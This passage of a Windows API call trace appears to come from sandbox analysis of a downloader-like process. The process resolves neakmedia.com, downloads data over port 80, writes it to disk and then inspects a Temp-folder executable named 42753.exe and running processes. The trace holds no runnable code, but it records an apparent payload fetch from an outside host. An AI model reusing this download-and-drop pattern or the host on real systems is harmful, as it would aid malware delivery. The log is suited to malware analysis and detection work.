IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5b8) returned 1 [0032.854] GetLastError () returned 0x0 [0032.855] CreateMutexW (lpMutexAttributes=0x24f7e40, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.855] GetLastError () returned 0x0 [0032.855] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.855] GetLastError () returned 0x0 [0032.855] ReleaseMutex (hMutex=0x478) returned 1 [0032.855] GetLastError () returned 0x0 [0032.855] CloseHandle (hObject=0x478) returned 1 [0032.855] GetLastError () returned 0x0 [0032.855] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f859c, cbSid=0x52ae5b8 | out: pSid=0x24f859c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5b8) returned 1 [0032.855] GetLastError () returned 0x0 [0032.855] CreateMutexW (lpMutexAttributes=0x24f86ac, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.855] GetLastError () returned 0x0 [0032.855] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.855] GetLastError () returned 0x0 [0032.856] ReleaseMutex (hMutex=0x478) returned 1 [0032.856] GetLastError () returned 0x0 [0032.856] CloseHandle (hObject=0x478) returned 1 [0032.856] GetLastError () returned 0x0 [0032.857] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x478 [0032.857] GetLastError () returned 0x0 [0032.858] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x480 [0032.858] GetLastError () returned 0x0 [0032.859] ioctlsocket (in: s=0x478, cmd=-2147195266, argp=0x52ae804 | out: argp=0x52ae804) returned 0 [0032.859] GetLastError () returned 0x0 [0032.859] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x484 [0032.860] GetLastError () returned 0x0 [0032.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x488 [0032.860] GetLastError () returned 0x0 [0032.860] ioctlsocket (in: s=0x484, cmd=-2147195266, argp=0x52ae804 | out: argp=0x52ae804) returned 0 [0032.860] GetLastError () returned 0x0 [0032.861] WSAIoctl (in: s=0x478, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x52ae7e8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x52ae7e8, lpOverlapped=0x0) returned -1 [0032.861] GetLastError () returned 0x2733 [0032.862] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x47877b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0032.862] GetLastError () returned 0x2733 [0032.863] WSAEventSelect (s=0x478, hEventObject=0x480, lNetworkEvents=512) returned 0 [0032.863] GetLastError () returned 0x0 [0032.863] WSAIoctl (in: s=0x484, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x52ae7e8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x52ae7e8, lpOverlapped=0x0) returned -1 [0032.863] GetLastError () returned 0x2733 [0032.863] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x47877b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0032.863] GetLastError () returned 0x2733 [0032.864] WSAEventSelect (s=0x484, hEventObject=0x488, lNetworkEvents=512) returned 0 [0032.864] GetLastError () returned 0x0 [0032.864] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x48c [0032.864] GetLastError () returned 0x0 [0032.865] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x48c, param_3=0x3) returned 0x0 [0032.870] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x52ae7cc | out: phkResult=0x52ae7cc*=0x4a4) returned 0x0 [0032.870] GetLastError () returned 0x0 [0032.872] RegOpenKeyExW (in: hKey=0x4a4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ae788 | out: phkResult=0x52ae788*=0x4a8) returned 0x0 [0032.872] GetLastError () returned 0x0 [0032.872] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4ac [0032.872] GetLastError () returned 0x0 [0032.872] RegNotifyChangeKeyValue (hKey=0x4a8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4ac, fAsynchronous=1) returned 0x0 [0032.872] GetLastError () returned 0x0 [0032.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ae788 | out: phkResult=0x52ae788*=0x4b0) returned 0x0 [0032.873] GetLastError () returned 0x0 [0032.873] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b4 [0032.873] GetLastError () returned 0x0 [0032.873] RegNotifyChangeKeyValue (hKey=0x4b0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b4, fAsynchronous=1) returned 0x0 [0032.873] GetLastError () returned 0x0 [0032.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ae788 | out: phkResult=0x52ae788*=0x4b8) returned 0x0 [0032.873] GetLastError () returned 0x0 [0032.873] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4bc [0032.874] GetLastError () returned 0x0 [0032.874] RegNotifyChangeKeyValue (hKey=0x4b8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4bc, fAsynchronous=1) returned 0x0 [0032.874] GetLastError () returned 0x0 [0032.874] GetCurrentProcess () returned 0xffffffff [0032.874] GetLastError () returned 0x3f0 [0032.874] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae770 | out: TokenHandle=0x52ae770*=0x4c0) returned 1 [0032.874] GetLastError () returned 0x3f0 [0032.879] GetCurrentProcess () returned 0xffffffff [0032.879] GetLastError () returned 0x3f0 [0032.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae38c | out: TokenHandle=0x52ae38c*=0x4c4) returned 1 [0032.879] GetLastError () returned 0x3f0 [0032.881] GetCurrentProcess () returned 0xffffffff [0032.881] GetLastError () returned 0x3f0 [0032.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae39c | out: TokenHandle=0x52ae39c*=0x4c8) returned 1 [0032.881] GetLastError () returned 0x3f0 [0032.895] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xe4a28 | out: pProxyConfig=0xe4a28) returned 1 [0032.975] GetLastError () returned 0x0 [0032.979] SetEvent (hEvent=0x414) returned 1 [0032.979] GetLastError () returned 0x0 [0032.993] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x52ae724 | out: ppwstrAutoConfigUrl=0x52ae724*=0x0) returned 0 [0044.019] GetLastError () returned 0x2f94 [0044.019] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x52ae724 | out: ppwstrAutoConfigUrl=0x52ae724*=0x0) returned 0 [0046.637] GetLastError () returned 0x2f94 [0046.644] GetCurrentProcess () returned 0xffffffff [0046.644] GetLastError () returned 0x3f0 [0046.644] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae3c4 | out: TokenHandle=0x52ae3c4*=0x524) returned 1 [0046.644] GetLastError () returned 0x3f0 [0046.646] GetCurrentProcess () returned 0xffffffff [0046.646] GetLastError () returned 0x3f0 [0046.646] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae3d4 | out: TokenHandle=0x52ae3d4*=0x4f8) returned 1 [0046.646] GetLastError () returned 0x3f0 [0046.646] SetEvent (hEvent=0x414) returned 1 [0046.646] GetLastError () returned 0x3f0 [0046.661] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x52ae724 | out: pFixedInfo=0x0, pOutBufLen=0x52ae724) returned 0x6f [0046.675] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x479edc8 [0046.675] GetLastError () returned 0x0 [0046.675] GetNetworkParams (in: pFixedInfo=0x479edc8, pOutBufLen=0x52ae724 | out: pFixedInfo=0x479edc8, pOutBufLen=0x52ae724) returned 0x0 [0046.689] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0046.689] GetLastError () returned 0x0 [0046.698] LocalFree (hMem=0x479edc8) returned 0x0 [0046.698] GetLastError () returned 0x0 [0046.701] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x530 [0046.701] GetLastError () returned 0x0 [0046.701] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x52c [0046.702] GetLastError () returned 0x0 [0046.705] getaddrinfo (in: pNodeName="neakmedia.com", pServiceName=0x0, pHints=0x52ae600*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x52ae394 | out: ppResult=0x52ae394*=0x47a2d00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="neakmedia.com", ai_addr=0x479df30*(sa_family=2, sin_port=0x0, sin_addr="70.39.145.109"), ai_next=0x0)) returned 0 [0046.721] GetLastError () returned 0x0 [0046.722] FreeAddrInfoW (pAddrInfo=0x47a2d00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="敮歡敭楤⹡潣mԸ隣ᮿ\x01蠀蒨ѹѹ愸\x07\x01", ai_addr=0x479df30*(sa_family=2, sin_port=0x0, sin_addr="70.39.145.109"), ai_next=0x0)) [0046.722] GetLastError () returned 0x0 [0046.723] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x534 [0046.723] GetLastError () returned 0x0 [0046.723] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x540 [0046.723] GetLastError () returned 0x0 [0046.723] ioctlsocket (in: s=0x534, cmd=-2147195266, argp=0x52ae5e4 | out: argp=0x52ae5e4) returned 0 [0046.723] GetLastError () returned 0x0 [0046.723] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x544 [0046.724] GetLastError () returned 0x0 [0046.724] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x548 [0046.724] GetLastError () returned 0x0 [0046.724] ioctlsocket (in: s=0x544, cmd=-2147195266, argp=0x52ae5e4 | out: argp=0x52ae5e4) returned 0 [0046.724] GetLastError () returned 0x0 [0046.724] WSAIoctl (in: s=0x534, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x52ae5c8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x52ae5c8, lpOverlapped=0x0) returned -1 [0046.724] GetLastError () returned 0x2733 [0046.724] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x47877b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0046.724] GetLastError () returned 0x2733 [0046.724] WSAEventSelect (s=0x534, hEventObject=0x540, lNetworkEvents=512) returned 0 [0046.724] GetLastError () returned 0x0 [0046.724] WSAIoctl (in: s=0x544, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x52ae5c8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x52ae5c8, lpOverlapped=0x0) returned -1 [0046.724] GetLastError () returned 0x2733 [0046.724] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x47877b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0046.724] GetLastError () returned 0x2733 [0046.724] WSAEventSelect (s=0x544, hEventObject=0x548, lNetworkEvents=512) returned 0 [0046.724] GetLastError () returned 0x0 [0046.726] GetAdaptersAddresses () returned 0x6f [0046.732] LocalAlloc (uFlags=0x0, uBytes=0xa44) returned 0x47b3dc8 [0046.733] GetLastError () returned 0x0 [0046.733] GetAdaptersAddresses () returned 0x0 [0046.746] LocalFree (hMem=0x47b3dc8) returned 0x0 [0046.746] GetLastError () returned 0x0 [0046.747] WSAConnect (in: s=0x530, name=0x2500018*(sa_family=2, sin_port=0x50, sin_addr="70.39.145.109"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0046.862] GetLastError () returned 0x0 [0046.863] closesocket (s=0x52c) returned 0 [0046.863] GetLastError () returned 0x0 [0046.866] send (in: s=0x530, buf=0x25018e0*, len=72, flags=0 | out: buf=0x25018e0*) returned 72 [0046.866] GetLastError () returned 0x0 [0046.867] setsockopt (s=0x530, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0046.867] GetLastError () returned 0x0 [0046.868] recv (in: s=0x530, buf=0x24fd1c8, len=4096, flags=0 | out: buf=0x24fd1c8*) returned 4096 [0047.064] GetLastError () returned 0x0 [0047.083] setsockopt (s=0x530, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0047.083] GetLastError () returned 0x0 [0047.084] recv (in: s=0x530, buf=0x2503ad4, len=65536, flags=0 | out: buf=0x2503ad4*) returned 8972 [0047.084] GetLastError () returned 0x0 [0047.085] WriteFile (in: hFile=0x410, lpBuffer=0x2513ba0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2513ba0*, lpNumberOfBytesWritten=0x52ae8ac*=0x1000, lpOverlapped=0x0) returned 1 [0047.086] GetLastError () returned 0x0 [0047.086] WriteFile (in: hFile=0x410, lpBuffer=0x2503c61*, nNumberOfBytesToWrite=0x217f, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2503c61*, lpNumberOfBytesWritten=0x52ae8ac*=0x217f, lpOverlapped=0x0) returned 1 [0047.086] GetLastError () returned 0x0 [0047.086] recv (in: s=0x530, buf=0x2503ad4, len=65536, flags=0 | out: buf=0x2503ad4*) returned 3752 [0047.178] GetLastError () returned 0x0 [0047.178] recv (in: s=0x530, buf=0x2503ad4, len=65536, flags=0 | out: buf=0x2503ad4*) returned 4960 [0047.178] GetLastError () returned 0x0 [0047.178] WriteFile (in: hFile=0x410, lpBuffer=0x2513ba0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2513ba0*, lpNumberOfBytesWritten=0x52ae8ac*=0x1000, lpOverlapped=0x0) returned 1 [0047.178] GetLastError () returned 0x0 [0047.178] WriteFile (in: hFile=0x410, lpBuffer=0x2503c2c*, nNumberOfBytesToWrite=0x1208, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2503c2c*, lpNumberOfBytesWritten=0x52ae8ac*=0x1208, lpOverlapped=0x0) returned 1 [0047.178] GetLastError () returned 0x0 [0047.178] recv (in: s=0x530, buf=0x2503ad4, len=65536, flags=0 | out: buf=0x2503ad4*) returned 23232 [0047.293] GetLastError () returned 0x0 [0047.293] WriteFile (in: hFile=0x410, lpBuffer=0x2503ad4*, nNumberOfBytesToWrite=0x5ac0, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2503ad4*, lpNumberOfBytesWritten=0x52ae8ac*=0x5ac0, lpOverlapped=0x0) returned 1 [0047.294] GetLastError () returned 0x0 [0047.294] recv (in: s=0x530, buf=0x2503ad4, len=57785, flags=0 | out: buf=0x2503ad4*) returned 45012 [0047.307] GetLastError () returned 0x0 [0047.307] WriteFile (in: hFile=0x410, lpBuffer=0x2503ad4*, nNumberOfBytesToWrite=0xafd4, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2503ad4*, lpNumberOfBytesWritten=0x52ae8ac*=0xafd4, lpOverlapped=0x0) returned 1 [0047.308] GetLastError () returned 0x0 [0047.308] recv (in: s=0x530, buf=0x2503ad4, len=12773, flags=0 | out: buf=0x2503ad4*) returned 4356 [0047.308] GetLastError () returned 0x0 [0047.308] WriteFile (in: hFile=0x410, lpBuffer=0x2503ad4*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2503ad4*, lpNumberOfBytesWritten=0x52ae8ac*=0x1104, lpOverlapped=0x0) returned 1 [0047.308] GetLastError () returned 0x0 [0047.308] recv (in: s=0x530, buf=0x2503ad4, len=8417, flags=0 | out: buf=0x2503ad4*) returned 1452 [0047.308] GetLastError () returned 0x0 [0047.308] recv (in: s=0x530, buf=0x2503ad4, len=6965, flags=0 | out: buf=0x2503ad4*) returned 6965 [0047.411] GetLastError () returned 0x0 [0047.411] WriteFile (in: hFile=0x410, lpBuffer=0x2513ba0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2513ba0*, lpNumberOfBytesWritten=0x52ae8ac*=0x1000, lpOverlapped=0x0) returned 1 [0047.411] GetLastError () returned 0x0 [0047.411] WriteFile (in: hFile=0x410, lpBuffer=0x2504528*, nNumberOfBytesToWrite=0x10e1, lpNumberOfBytesWritten=0x52ae8ac, lpOverlapped=0x0 | out: lpBuffer=0x2504528*, lpNumberOfBytesWritten=0x52ae8ac*=0x10e1, lpOverlapped=0x0) returned 1 [0047.411] GetLastError () returned 0x0 [0047.411] recv (in: s=0x530, buf=0x25036e8, len=2, flags=0 | out: buf=0x25036e8*) returned 2 [0047.411] GetLastError () returned 0x0 [0047.411] recv (in: s=0x530, buf=0x25036e8, len=1, flags=0 | out: buf=0x25036e8*) returned 1 [0047.411] GetLastError () returned 0x0 [0047.411] recv (in: s=0x530, buf=0x25036e8, len=1, flags=0 | out: buf=0x25036e8*) returned 1 [0047.411] GetLastError () returned 0x0 [0047.411] recv (in: s=0x530, buf=0x25036e8, len=1, flags=0 | out: buf=0x25036e8*) returned 1 [0047.411] GetLastError () returned 0x0 [0047.411] recv (in: s=0x530, buf=0x25036e8, len=2, flags=0 | out: buf=0x25036e8*) returned 2 [0047.411] GetLastError () returned 0x0 [0047.412] SetEvent (hEvent=0x414) returned 1 [0047.412] GetLastError () returned 0x0 [0047.412] CloseHandle (hObject=0x410) returned 1 [0047.414] GetLastError () returned 0x0 [0047.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47877b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.423] GetLastError () returned 0xcb [0047.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47877b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.432] GetLastError () returned 0xcb [0047.471] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x52ae124, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0047.471] GetLastError () returned 0xcb [0047.472] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", nBufferLength=0x105, lpBuffer=0x52ae14c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", lpFilePart=0x0) returned 0x35 [0047.472] GetLastError () returned 0xcb [0047.472] SetErrorMode (uMode=0x1) returned 0x1 [0047.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe"), fInfoLevelId=0x0, lpFileInformation=0x21b9988 | out: lpFileInformation=0x21b9988*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e29f850, ftCreationTime.dwHighDateTime=0x1d34346, ftLastAccessTime.dwLowDateTime=0x3e29f850, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x473f97b0, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x19000)) returned 1 [0047.472] GetLastError () returned 0xcb [0047.472] SetErrorMode (uMode=0x1) returned 0x1 [0047.473] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x52ae40c, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0047.473] GetLastError () returned 0xcb [0047.473] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", nBufferLength=0x105, lpBuffer=0x52ae434, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", lpFilePart=0x0) returned 0x35 [0047.473] GetLastError () returned 0xcb [0047.473] SetErrorMode (uMode=0x1) returned 0x1 [0047.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe"), fInfoLevelId=0x0, lpFileInformation=0x52ae8b4 | out: lpFileInformation=0x52ae8b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e29f850, ftCreationTime.dwHighDateTime=0x1d34346, ftLastAccessTime.dwLowDateTime=0x3e29f850, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x473f97b0, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x19000)) returned 1 [0047.474] GetLastError () returned 0xcb [0047.474] SetErrorMode (uMode=0x1) returned 0x1 [0047.475] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x52ae3d4, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0047.475] GetLastError () returned 0xcb [0047.475] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", nBufferLength=0x105, lpBuffer=0x52ae3fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", lpFilePart=0x0) returned 0x35 [0047.475] GetLastError () returned 0xcb [0047.475] SetErrorMode (uMode=0x1) returned 0x1 [0047.475] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe"), fInfoLevelId=0x0, lpFileInformation=0x52ae87c | out: lpFileInformation=0x52ae87c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e29f850, ftCreationTime.dwHighDateTime=0x1d34346, ftLastAccessTime.dwLowDateTime=0x3e29f850, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x473f97b0, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x19000)) returned 1 [0047.475] GetLastError () returned 0xcb [0047.475] SetErrorMode (uMode=0x1) returned 0x1 [0047.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47877b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.476] GetLastError () returned 0xcb [0047.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x47877b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.477] GetLastError () returned 0xcb [0047.479] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x52ae1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0047.479] GetLastError () returned 0xcb [0047.479] SetErrorMode (uMode=0x1) returned 0x1 [0047.479] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x21c034c | out: lpFileInformation=0x21c034c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0047.479] GetLastError () returned 0xcb [0047.479] SetErrorMode (uMode=0x1) returned 0x1 [0047.479] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x105, lpBuffer=0x52ae1b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x0) returned 0x20 [0047.479] GetLastError () returned 0xcb [0047.479] SetErrorMode (uMode=0x1) returned 0x1 [0047.479] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x21c04f8 | out: lpFileInformation=0x21c04f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x237c2aa0, ftCreationTime.dwHighDateTime=0x1d2dbc2, ftLastAccessTime.dwLowDateTime=0x365f3810, ftLastAccessTime.dwHighDateTime=0x1d34346, ftLastWriteTime.dwLowDateTime=0x365f3810, ftLastWriteTime.dwHighDateTime=0x1d34346, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0047.479] GetLastError () returned 0xcb [0047.479] SetErrorMode (uMode=0x1) returned 0x1 [0047.482] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0xbcc60 [0047.482] RtlMoveMemory (in: Destination=0xbcc60, Source=0x21bb204, Length=0x5e | out: Destination=0xbcc60) [0047.483] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x477da58 [0047.483] RtlMoveMemory (in: Destination=0x477da58, Source=0x21c1708, Length=0x42 | out: Destination=0x477da58) [0047.564] LocalFree (hMem=0xbcc60) returned 0x0 [0047.564] GetLastError () returned 0x0 [0047.564] LocalFree (hMem=0x477da58) returned 0x0 [0047.564] GetLastError () returned 0x0 [0047.566] NtQueryInformationProcess (in: ProcessHandle=0x584, ProcessInformationClass=0x0, ProcessInformation=0x21c1cdc, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x21c1cdc, ReturnLength=0x0) returned 0x0 [0047.567] EnumProcesses (in: lpidProcess=0x21c1d00, cb=0x400, lpcbNeeded=0x52ae9d0 | out: lpidProcess=0x21c1d00, lpcbNeeded=0x52ae9d0) returned 1 [0047.569] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x394) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x38c) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x3a8) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x374) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x324) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x398) returned 1 [0047.597] GetLastError () returned 0x0 [0047.597] SetEvent (hEvent=0x300) returned 1 [0047.598] GetLastError () returned 